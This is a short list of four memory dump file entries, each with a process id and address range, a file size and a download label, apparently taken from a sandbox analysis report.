memory/2032-127-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/2564-233-0x00000000195C4000-0x00000000195C6000-memory.dmp

Filesize
8KB

Download
memory/2564-262-0x00000000195CA000-0x00000000195E9000-memory.dmp

Filesize
124KB

Download
memory/2564-232-0x00000000195C0000-0x00000000195C2000-memory.dmp

Filesize
8KB

Download